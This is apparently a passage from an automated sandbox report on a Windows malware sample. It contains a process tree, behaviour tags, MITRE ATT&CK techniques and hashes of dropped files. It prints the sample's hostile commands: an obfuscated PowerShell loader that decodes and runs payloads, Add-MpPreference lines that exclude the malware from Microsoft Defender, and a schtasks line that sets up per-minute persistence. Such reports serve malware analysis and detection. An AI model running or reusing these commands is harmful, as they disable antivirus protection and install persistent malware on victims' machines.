(decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1204
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system" /tr "C:\Users\Admin\system.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:4576
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3588
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:816
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2772
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:5064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:1464
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1252
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
2KB
MD59c360589ecf6d472692680f73445f2b0
SHA1e6f95eaa97f6a3de212dd1d4cad103e5f7708b3d
SHA256267aa84afe3f6ea4d6afa6168f1a918dfe62ba2e8b29704789e2b7ff0e3ce2f8
SHA5121f3aaf519c9755c639dbec25dca18db36977926c334d4ca7dcf6dd1137655983c2ab030f0459793372a1886c3c886fe5233a74bb27d42d450c947486cd5832c9
-
Filesize
1KB
MD517220e43826a321b91237968b1f2fc35
SHA1f8731a6d16e7bdc32e1e758e974d56976fe62253
SHA256e4b7cba2b8b22ff90b62b0a462137207b8c801e5c82d8130aa4129ddb1bb6881
SHA51230aa77e58378ba32471902775acc0a4250cab9b6abf989aa4ba956e2d8d2e6592f7f52bf12d9f6fd53824dccf118f67a5c309fec9d397355e99f64bcffb01384
-
Filesize
944B
MD54a154efa7af25bb8b94d0d9c7b4f15cd
SHA15e0e04103e4eef1bc7ef242b730aed1958f98e1f
SHA256c216eda372556eb78e680bde247c2fd2085642ee33031905a213c6bec502ccce
SHA512fc4678133318fe1952947be74e244246336c7faacc9b9ae32336d57b106ec8f044e5db41dd98e8f3a54270ddacab2fc84a66d5d67deeadc3056ea5213bcbbba4
-
Filesize
944B
MD504f1d68afbed6b13399edfae1e9b1472
SHA18bfdcb687a995e4a63a8c32df2c66dc89f91a8b0
SHA256f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de
SHA51230c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75
-
Filesize
944B
MD577829a5befd19fac8cc20f353682665d
SHA131d68ed9895021d3b628bc877d7689be9ce5fff3
SHA2561fd8102749630516242268655f8d982269567cc4e8984d23c8b578a11c536209
SHA512d736796fc8c365da8a7b4c36629cc925bfb58d0f024e5191ed39ebb1e802862d708d94b46034959c342d0d11d123b44ea127965bb3ac50173ccf039ceb7d78f4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
408KB
MD534d172bddcf176f4a3c85f2b8083850c
SHA16e4fd033d2ed62b464db43b6af1f5bb0e9283a46
SHA256ecb640f4a29fea8d3fb020aa2b41bdc446703c4b1ede6b5c72621229b270bf42
SHA512c52171f7c68902cfe5da18b2a76a59c5a27f1cec92ee330f57f18f9b257079b49d5ff445f4251ad13ba5886e274d5286e062c39cac3a77bbef71909502ab3516
-
Filesize
124B
MD5d48ff0d6825fe7d93eec3e6edfaf1d6e
SHA14a4f34374ccd4e7fb9a5a46091ed55ea3ec7edc8
SHA256555285b0157d1ed6806d3a78a36ce4cf2caecb7422040ba420b16395ff418272
SHA512510db90e1fcef1412fc416eb494f2fa67df82f155ec050a24f6b258b76d16f60df855ad5723eadff99d82393f7b38e666d5bf6cd817eb4d1508ac8bbe7a1f995
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4